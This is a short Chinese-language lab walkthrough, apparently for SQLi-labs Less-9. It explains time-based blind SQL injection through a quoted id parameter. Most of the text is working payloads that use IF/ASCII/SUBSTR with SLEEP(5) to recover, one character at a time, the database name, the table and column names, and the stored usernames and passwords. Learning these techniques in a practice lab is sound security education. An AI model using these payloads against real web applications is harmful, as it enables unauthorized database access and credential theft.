Less-9 Get - Blind -Time based -Single Quotes
原页面
基于时间的盲注
如果是正确的直接返回,错误的时候等待5秒钟。
1.猜测数据库:
?id=1’ and If(ascii(substr(database(),1,1))=115,1,sleep(5))–+
?id=1’ and If(ascii(substr(database(),1,1))=114,1,sleep(5))–+
说明第一位是s (ascii码是115)
?id=1’and If(ascii(substr(database(),2,1))=101,1,sleep(5))–+
说明第二位是e (ascii码是101)
… 以此类推,得到数据库名字是security
2.猜测security数据库的数据表:
?id=1’and If(ascii(substr((select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),1,1))=101,1,sleep(5))–+
?id=1’and If(ascii(substr((select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),1,1))=100,1,sleep(5))–+
说明第一个数据表的第一位是e,…依次类推,得到emails
?id=1’and If(ascii(substr((select table_name from information_schema.tables where table_schema=‘security’ limit 1,1),1,1))=114,1,sleep(5))–+
(判断步骤同上)
多次尝试后得到所有的数据表emails,referers,uagents,users
3.猜测users表的列:
?id=1’and If(ascii(substr((select column_name from information_schema.columns where table_name=‘users’ limit 0,1),1,1))=105,1,sleep(5))–+
(判断步骤同上)
多次尝试,到列名是id,username,password
4.猜测username的值:
?id=1’and If(ascii(substr((select username from users limit 0,1),1,1))=68,1,sleep(5))–+
(判断步骤同上)
多次尝试 得到所有的用户名和密码
